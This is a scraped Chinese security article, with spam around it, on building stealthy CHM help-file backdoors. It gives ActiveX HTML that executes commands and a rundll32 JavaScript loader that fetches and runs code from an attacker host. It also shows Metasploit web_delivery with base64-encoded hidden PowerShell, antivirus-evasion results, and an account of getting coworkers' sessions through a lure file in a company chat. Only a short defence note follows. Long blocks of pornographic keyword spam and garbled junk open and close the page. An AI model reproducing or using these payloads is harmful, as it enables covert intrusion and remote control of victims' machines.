精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

高級組合技打造捆綁后門及防御建議

安全 應用安全
CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內(nèi)容以類似數(shù)據(jù)庫的形式編譯儲存。

一、CHM簡介

在介紹怎么使用CHM來作為后門之前,首先要知道CMH是什么東西。

CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內(nèi)容以類似數(shù)據(jù)庫的形式編譯儲存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見圖形文件(GIF、JPEG、PNG)、音頻視頻文件(MID、WAV、AVI)等等,并可以通過URL與Internet聯(lián)系在一起。因為使用方便,形式多樣也被采用作為電子書的格式。

二、CHM制作

CHM的制作方法很多。有多款工具可以使用,這里就不在做詳細的介紹了。本次測試使用了EasyCHM來制作CHM文件,使用起來非常簡單。

新建如下目錄,文件內(nèi)容隨意:

打開EasyCHM,新建->瀏覽。選擇該目錄。默認文件類型:

點擊確認,即可看到預覽的CHM文件:

選擇編譯,即可編譯成CHM文件。

三、CHM Execute Command

14年的時候@ithurricanept 在twitter上發(fā)了一個demo,通過CHM運行計算器:

利用代碼如下:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command"    value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  

將以上代碼寫入html,置于工程目錄進行編譯,生成CHM文件,運行此文件,彈出計算器:

四、去除彈框

有測試過nishang Out-CHM的同學會發(fā)現(xiàn),運行生成的CHM文件的時候會看到明顯的彈框。就像這樣:

某個晚上突然腦洞了一下,想到了一個好的方式來讓他不顯示彈框,即結(jié)合使用JavaScript Backdoor。經(jīng)過測試,成功實現(xiàn)在不彈框的情況下獲取meterpreter會話,此次測試使用一個我修改過的python版 JSRat.ps1 ,地址為:https://github.com/Ridter/MyJSRat。使用方式詳見 readme。

以下為完整的測試過程:

1. 結(jié)合CHM + JSBackdoor

使用交互模式的JSRat server:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 

訪問 http://192.168.1.101:8080/wtf 獲取攻擊代碼如下:

  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c    taskkill /f /im rundll32.exe",0,true);}  

經(jīng)過多次測試,成功將以上命令寫入chm,其Html代碼為:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>This is a demo ! <br><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM    name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","    http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  

編譯以后運行,可以成功獲取JS交互shell:

直接執(zhí)行cmd /c command 是會有黑框的,可以使用run來避免顯示黑框。執(zhí)行run以后,輸入 whoami > e:\1.txt 之后通過read 來獲取回顯。

2. 獲取meterpreter會話

此次測試獲取meterpreter會話的方式是通過執(zhí)行powershell命令,直接獲取,當獲取客戶端JS 交互shell之后自動執(zhí)行powershell命令,獲取meterpreter會話。具體操作如下:

開啟MSF web_delivery:

  1. ~  msfconsole -Lqmsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf    exploit(web_delivery) > set lhost 192.168.1.101lhost => 192.168.1.101msf exploit(web_delivery) > set lport 6666lport => 6666msf exploit(web_delivery) > set SRVPORT 8081SRVPORT => 8081msf exploit(web_delivery) >    set uripath /uripath => /msf exploit(web_delivery) > exploit[*] Exploit running as background job.msf exploit(web_delivery) >[*] Started reverse TCP handler on 192.168.1.101:6666[*] Using URL: http://0.0.0.0:8081/[*]    Local IP: http://192.168.1.101:8081/[*] Server started.[*] Run the following command on the target machine:powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX    $n.downloadstring('http://192.168.1.101:8081/');  

裝有powershell的客戶端執(zhí)行以下命令則可獲取meterpreter會話:

  1. powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');  

由于存在特殊字符,我們可以把以上代碼編碼為base64格式,將以下代碼存入power.txt:

  1. $n=new-object net.webclient; $n.proxy=[Net.WebRequest]::GetSystemWebProxy(); $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; IEX $n.downloadstring('http://192.168.1.101:8081/');  

執(zhí)行以下命令:

  1. cat power.txt | iconv --to-code UTF-16LE |base64  

最終要執(zhí)行的powershell命令為:

  1. powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==  

使用執(zhí)行命令模式直接獲取meterpreter會話:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="  

測試過程中,從運行CHM到獲取meterpreter,客戶端無明顯異常,全程無黑框彈出,獲取到meterpreter會話如下圖:

3. 是否被殺?

可能很多人會問,會不會被殺,下面是virscan的查殺結(jié)果:

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

五、利用場景

注: 隨便找了幾個漏洞利用工具修改了文件名,并不代表原作者分享的工具有問題。

六、實際測試

是用上述方式制作chm文件,命名為一個比較有吸引力的名字,比如在公司技術群發(fā)了一個名字為”制作免殺后門.chm”的文件,實際測試結(jié)果如下圖:

成功獲取多個人的meterpreter會話。

七、防御

最好的防御就是提高個人安全意識,對于此類文件,多注意一下,盡量別亂點。如果非要點,可以放到虛擬機里面,使用procexp.exe可以看到存在后門的chm文件會開啟新的進程:

對于碰到這種后門,怎么溯源呢,其實也很簡單,chm是可以反編譯為html的。

使用windows自帶的hh.exe 則可進行反編譯。命令如下:

  1. C:\Users\evi1cg\Desktop>hh -decompile test poc.chm  

#test 為當前目錄的test文件夾。

執(zhí)行結(jié)果如下:

這樣就可以看到其源代碼并可以找到攻擊者的監(jiān)聽服務器了。

至于其他防御姿勢,知道的小伙伴可以分享一下。

八、小結(jié)

此次測試就是對一些已知的攻擊手法進行結(jié)合,結(jié)果是讓此捆綁后門更加隱蔽,近乎“完美”,美中不足的是在文件開啟的時候會出現(xiàn)短暫的卡頓。有時候小漏洞結(jié)合起來能造成大危害,小手法結(jié)合起來也能成大殺器。本著分享的精神將此姿勢介紹,希望小伙伴們能免受其害。

九、參考

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2016-04-01 09:32:52

2018-11-20 10:09:28

網(wǎng)絡安全網(wǎng)絡安全技術周刊

2014-06-19 15:44:31

2010-09-25 08:44:34

捆綁后門

2023-01-06 08:42:02

學習訓練

2024-09-03 08:00:00

2009-08-27 17:57:54

2015-12-02 16:46:20

2014-09-18 09:42:15

2010-09-17 16:23:53

分離捆綁后門

2021-12-29 18:16:31

威脅防御

2025-04-29 08:18:48

2009-02-11 19:39:32

IEWindowsChrome

2011-09-29 20:52:51

百銳防御信息安全

2015-12-21 10:28:20

2009-01-03 11:01:06

2016-03-01 11:34:55

2018-01-18 23:06:54

2010-09-30 15:20:01

2023-07-26 17:13:38

點贊
收藏

51CTO技術棧公眾號

成人黄页网站视频| 日本美女一级片| 久久久精品久久久久久96| 91麻豆精品国产自产在线 | 精品日产免费二区日产免费二区| 欧美日韩成人在线| 777av视频| 最新97超碰在线| 丁香五精品蜜臀久久久久99网站| 国产成人鲁鲁免费视频a| 久久中文免费视频| 亚洲va久久久噜噜噜久久| 欧美顶级少妇做爰| 日日摸日日碰夜夜爽av| a级影片在线| 国产亚洲欧洲一区高清在线观看| 春色成人在线视频| 亚洲一区二区激情| 亚洲欧美日韩精品一区二区 | 久久久一二三区| 欧美日韩在线二区| 日韩精品中文在线观看| 色哟哟免费视频| 朝桐光一区二区| 亚洲成人午夜电影| 黑人巨茎大战欧美白妇| 在线免费观看黄色网址| 久久一日本道色综合| yellow视频在线观看一区二区| 这里只有久久精品视频| 99在线观看免费视频精品观看| 不卡毛片在线看| 日本一卡二卡在线播放| 国产亚洲一区二区三区啪 | 国内在线免费高清视频| 不卡一区中文字幕| 国产二区不卡| 成 人 免费 黄 色| 激情成人综合网| 国产精品自拍网| 波多野结衣视频网址| 国产精品社区| 91av在线国产| 久久久久久久久久久久久久av| 精品福利av| 久久久久久久久久久久久久久久久久av| 国产日产精品一区二区三区的介绍| 国产中文字幕一区二区三区| 亚洲精选一区二区| www.色多多| 伊人久久大香线蕉av不卡| 日韩av在线最新| 国产精品福利导航| 日韩av午夜| 亚洲欧美视频在线| 欧美波霸videosex极品| 日韩成人免费| 久久激情视频免费观看| 日日噜噜夜夜狠狠久久波多野| 天天超碰亚洲| 欧美成人激情视频| 国产亚洲精品av| 亚洲精华国产欧美| 81精品国产乱码久久久久久| 成人在线免费看视频| 亚洲一区二区伦理| 国产精品成人免费电影| 7777久久亚洲中文字幕| 国产精品66部| 国产综合色一区二区三区| 亚洲三区在线播放| 亚洲国产精品t66y| 8x8x华人在线| 在线视频超级| 欧美性猛交xxxxxx富婆| 99精品999| silk一区二区三区精品视频| 日韩高清av在线| 久久久精品成人| 亚洲精品成人无限看| 久久久在线免费观看| 黑人精品无码一区二区三区AV| 日韩专区中文字幕一区二区| 成人av番号网| 少妇无码一区二区三区| 91一区二区三区在线观看| 欧美一区二区三区在线免费观看| 免费大片黄在线观看视频网站| 亚洲综合成人在线视频| 久久久久久久久久久久久国产精品| 成人做爰视频www| 欧美一级xxx| 极品白嫩丰满美女无套| 99国产精品免费视频观看| 久久久久久av| 中文字幕 人妻熟女| 国产精品一区在线观看你懂的| 九色视频成人porny| 99精品老司机免费视频| 亚洲第一在线综合网站| 在线免费视频一区| 另类图片第一页| 日韩一区二区三区国产| 色播视频在线播放| 激情久久五月天| 日本免费高清一区| 女囚岛在线观看| 欧美日韩一区二区电影| 日韩免费高清一区二区| 天天超碰亚洲| 国产精品美乳在线观看| 手机亚洲第一页| 一区二区三区 在线观看视频| 色婷婷综合久久久久中文字幕| 136国产福利精品导航网址应用| 国产亚洲欧美视频| 日韩成人一区二区三区| 国产精品888| 人人妻人人澡人人爽精品欧美一区| 日韩激情电影免费看| 日韩精品一区二区三区中文精品| 人妻精品久久久久中文| 日韩一级欧洲| 高清日韩一区| 午夜dj在线观看高清视频完整版| 欧美日韩在线一区二区| 男女做爰猛烈刺激| 99成人在线| 国产日韩亚洲精品| 欧美午夜大胆人体| 日韩欧美三级在线| 澳门黄色一级片| 久久成人18免费观看| 亚洲va韩国va欧美va精四季| 国产免费不卡| 亚洲欧美国内爽妇网| 日韩精品久久久久久久酒店| 岛国一区二区三区| 国产精品久久国产| 97se亚洲国产一区二区三区| 久久精品视频在线观看| 夜夜嗨av禁果av粉嫩avhd| 国产精品视频看| 一本岛在线视频| 日本欧美视频| 国产精品极品美女在线观看免费 | 中文字幕在线精品| 最新中文字幕第一页| 久久久不卡网国产精品一区| 国产精品动漫网站| 欧美理论电影大全| 国产一区二区色| 菠萝蜜视频国产在线播放| 91精品国产综合久久精品app | 国产在线一二| 欧美色综合久久| 三级黄色片在线观看| 韩国三级电影一区二区| 日本精品免费视频| 亚洲一二av| 91成人免费观看网站| 清纯唯美亚洲色图| 欧美在线啊v一区| 国产91在线播放九色| 国产激情偷乱视频一区二区三区| 福利在线一区二区| 亚洲人成亚洲精品| 国产日韩中文字幕| 怡红院在线观看| 亚洲精品99999| 无码人妻久久一区二区三区| 国产精品美女久久久久av爽李琼| 男女污污视频网站| 亚洲欧洲一区| 天堂av一区二区| 国产日韩一区二区三免费高清| 欧美日韩国产999| 五月婷婷六月色| 欧美性欧美巨大黑白大战| 欧美日韩在线观看成人| 99精品国产99久久久久久白柏| 免费激情视频在线观看| 91成人超碰| 老牛影视免费一区二区| 男人天堂久久| 国产69精品久久久久99| 国产区视频在线| 日韩欧美色电影| 波多野结衣黄色网址| 一区二区三区精品| 国产又粗又猛又爽视频| 国产精品一区一区| 欧美精品第三页| 日本中文在线视频| 激情久久久久久| 日韩精品久久久毛片一区二区| 久久久久九九精品影院| 日本三级韩国三级久久| 丝袜在线视频| 自拍偷拍亚洲在线| 日本黄色三级视频| 欧美电影在线免费观看| 亚洲欧美另类在线视频| 伊人婷婷欧美激情| 精品日韩在线视频| 99精品欧美一区二区三区综合在线| 天天干天天干天天干天天干天天干| 国产精品s色| 亚洲精品成人a8198a| 老司机精品在线| 91黄在线观看| 欧美一区二区三区婷婷| 国产91|九色| 欧美xxxx性xxxxx高清| 最新91在线视频| 日本福利片高清在线观看| 欧美第一区第二区| 国产又爽又黄免费软件| 欧洲一区二区三区在线| 日韩福利片在线观看| 亚洲乱码国产乱码精品精98午夜| x88av在线| 久久久亚洲综合| 亚洲精品乱码久久| 本田岬高潮一区二区三区| 天堂av8在线| 蜜乳av一区二区| 91视频免费版污| 蜜桃av一区| 免费观看精品视频| 99香蕉国产精品偷在线观看 | 成人欧美一区二区三区在线观看 | 久久99伊人| 欧美一级视频免费看| 欧美色图麻豆| 青青草免费在线视频观看| 天天做天天爱天天综合网| 亚洲春色综合另类校园电影| 国产精品一区二区三区av麻 | 成人综合影院| 亚洲少妇中文在线| 国产在线免费观看| 在线日韩欧美视频| 成年人视频免费在线观看| 国产一区二区三区在线观看网站| 午夜视频在线播放| 精品中文视频在线| 瑟瑟在线观看| 亚洲午夜av久久乱码| 欧美777四色影视在线| 亚洲精品中文字幕av| 深夜视频在线免费| 国产一区二区久久精品| 91porn在线观看| 久久精品国产69国产精品亚洲| 麻豆视频在线| 久久99久久99精品中文字幕| 国内老司机av在线| 777777777亚洲妇女| 欧美大片免费| 国产女人精品视频| 日本在线一区二区| 亚洲一区二区三区在线免费观看| 亚洲国产中文在线| 国产在线一区二区三区播放| 小嫩嫩12欧美| 亚洲一区二区三区在线观看视频| 婷婷色综合网| 久久精品xxx| 视频在线观看91| 亚洲国产成人va在线观看麻豆| 国产老妇另类xxxxx| www国产视频| 国产欧美日本一区视频| 午夜爽爽爽男女免费观看| 亚洲成av人片在线观看| 日韩美一区二区| 91精品国产欧美一区二区成人 | 91嫩草国产线观看亚洲一区二区| 91影视免费在线观看| 免费看成人人体视频| 亚洲成色www久久网站| 午夜欧美精品| 成年人小视频网站| 国产成人在线影院| 熟女俱乐部一区二区视频在线| 中文字幕亚洲欧美在线不卡| 精品人妻在线播放| 91黄色免费看| av免费在线观看不卡| 亚洲欧美国产精品| 超碰最新在线| 欧美一级视频在线观看| 日韩一区二区三区四区五区| 精品伦精品一区二区三区视频| 欧美日韩一二三四| 蜜臀av无码一区二区三区| 欧美aⅴ一区二区三区视频| 精品国产aⅴ一区二区三区东京热| 久久亚洲春色中文字幕久久久| 黄色一级片中国| 日本韩国一区二区三区视频| 亚洲AV无码成人片在线观看| 这里只有精品久久| 麻豆mv在线看| 成人性色av| 91精品天堂福利在线观看| 欧美极品欧美精品欧美图片| 福利一区福利二区| 福利视频第一页| 色狠狠综合天天综合综合| 成人毛片在线精品国产| 全亚洲第一av番号网站| 久久久人成影片一区二区三区| 91九色综合| 欧美极品日韩| 亚洲二区在线| 欧美人与性动交α欧美精品| 中文字幕欧美日本乱码一线二线| 男女啊啊啊视频| 欧美xxxxx牲另类人与| 一本一道波多野毛片中文在线| 人妖精品videosex性欧美| aiai久久| 中文字幕色呦呦| 激情深爱一区二区| 日韩中文字幕有码| 色综合久久88色综合天天免费| 韩国av永久免费| 欧美福利视频在线观看| 精品国产麻豆| 日韩视频在线免费播放| 蜜桃视频一区二区三区在线观看| 色噜噜日韩精品欧美一区二区| 天天亚洲美女在线视频| 亚洲欧美激情国产综合久久久| 欧美成人国产va精品日本一级| 精品伊人久久| 4444在线观看| 国产伦精品一区二区三区免费 | 亚洲资源中文字幕| 国产v在线观看| 久久99视频精品| 9l视频自拍九色9l视频成人| 国产视频在线观看网站| 国产高清久久久| 妺妺窝人体色www在线下载| 日韩欧美激情四射| 免费男女羞羞的视频网站在线观看| 亚洲在线一区二区| 欧美日韩精品| 一级全黄裸体片| 亚洲妇女屁股眼交7| 无码精品人妻一区二区三区影院| 7777精品久久久久久| 小嫩嫩12欧美| 色悠悠久久综合网| 18涩涩午夜精品.www| 国产熟女精品视频| 欧美精品久久久久久久免费观看| 成人精品毛片| 日韩激情免费视频| 国产情人综合久久777777| 又污又黄的网站| 欧美精品免费在线| 激情小说一区| 欧美日韩大尺度| 国产精品久久久久久久第一福利| 99久久婷婷国产一区二区三区| 欧美裸体xxxx极品少妇| 加勒比色老久久爱综合网| 国产99久久九九精品无码| 国产片一区二区三区| 国产又粗又猛又爽又黄的| 欧美精品福利在线| 美女久久久久| 一级黄色片在线免费观看| 亚洲一区在线电影| 国产理论电影在线观看| 91在线观看免费高清完整版在线观看| 亚洲网站啪啪| 亚洲а∨天堂久久精品2021| 欧美一区二区视频网站| 电影在线观看一区| 亚洲开发第一视频在线播放| 国产电影一区二区三区| 99热在线观看免费精品| 色偷偷偷亚洲综合网另类| 91成人精品在线| 热久久精品国产| 一区二区三区四区在线播放| 久久国产精品高清一区二区三区| 成人美女免费网站视频| 一区二区三区四区五区精品视频 | 亚洲天堂视频一区| 欧美久久一区二区| 中文在线最新版地址| 日本免费黄色小视频| 国产三级久久久| 可以免费观看的毛片|